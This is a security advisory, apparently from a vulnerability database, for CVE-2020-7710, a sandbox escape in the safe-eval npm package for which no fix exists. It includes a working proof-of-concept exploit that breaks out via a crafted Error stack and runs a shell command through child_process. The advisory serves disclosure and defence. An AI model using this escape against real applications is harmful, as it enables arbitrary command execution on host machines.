Sandbox Escape

Affecting safe-eval package, ALL versions

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

safe-eval is a Safer version of eval()

Affected versions of this package are vulnerable to Sandbox Escape. It is possible for an attacker to run an arbitrary command on the host machine.

POC by Anirudh Anand (for node 12.13.0)

const safeEval = require('safe-eval');

const theFunction = function() {
   const bad = new Error();
   bad.__proto__ = null;
   bad.stack = {
      match(outer) {
         throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString();
      }
   };
   return bad;
};

const untrusted = `(${theFunction})()`;
console.log(safeEval(untrusted));

Remediation

There is no fixed version for safe-eval.

References

CVSS Score

8.1
high severity
  • Attack Vector
    Network
  • Attack Complexity
    High
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C
Credit
Anirudh Anand
CVE
CVE-2020-7710
CWE
CWE-265
Snyk ID
SNYK-JS-SAFEEVAL-608076
Disclosed
28 Feb, 2020
Published
21 Aug, 2020